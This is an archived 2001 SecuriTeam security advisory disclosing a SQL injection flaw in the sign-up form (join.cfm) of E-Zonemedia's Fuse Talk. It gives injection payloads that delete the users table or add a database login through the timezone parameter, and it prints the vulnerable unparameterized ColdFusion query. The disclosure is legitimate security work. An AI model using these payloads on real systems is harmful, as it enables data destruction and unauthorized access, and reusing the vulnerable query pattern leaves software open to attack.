[NT] Fuse Talk SQL Insertion Vulnerability
From: support@securiteam.comDate: 11/04/01
- Previous message: support@securiteam.com: "[UNIX] Vulnerability in Viralator Proxy Extension"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [NT] Fuse Talk SQL Insertion Vulnerability Message-Id: <20011104071738.9AC8A138BF@mail.der-keiler.de> Date: Sun, 4 Nov 2001 08:17:38 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Fuse Talk SQL Insertion Vulnerability
------------------------------------------------------------------------
SUMMARY
E-Zonemedia's Fuse Talk is vulnerable to malicious SQL injection. Improper
form sanitization makes it possible for any user to manipulate data as
they see fit. The vulnerability is present in the sign up form (join.cfm),
a well-crafted form variable will execute malicious SQL. This is caused
because the form does not filtering out semi-colon (;).
DETAILS
Example:
Examine the following code:
1;delete from users
or
1;exec sp_addlogin "whatever"
If they are passed to the time zones parameter, the following SQL will be
executed:
select chdifference from timezones where itimezoneid = 1;exec sp_addlogin
"whatever"
This will have the effect of adding a new user to the SQL's user database,
allowing the user to logon without requiring a password.
Vulnerable code:
<cfquery name="qgetdiff" datasource="#ds#">
select chdifference from timezones where itimezoneid = #timezone#
</cfquery>
ADDITIONAL INFORMATION
The information has been provided by <mailto:acole76@bellsouth.net>
Anthony Cole.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Vulnerability in Viralator Proxy Extension"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
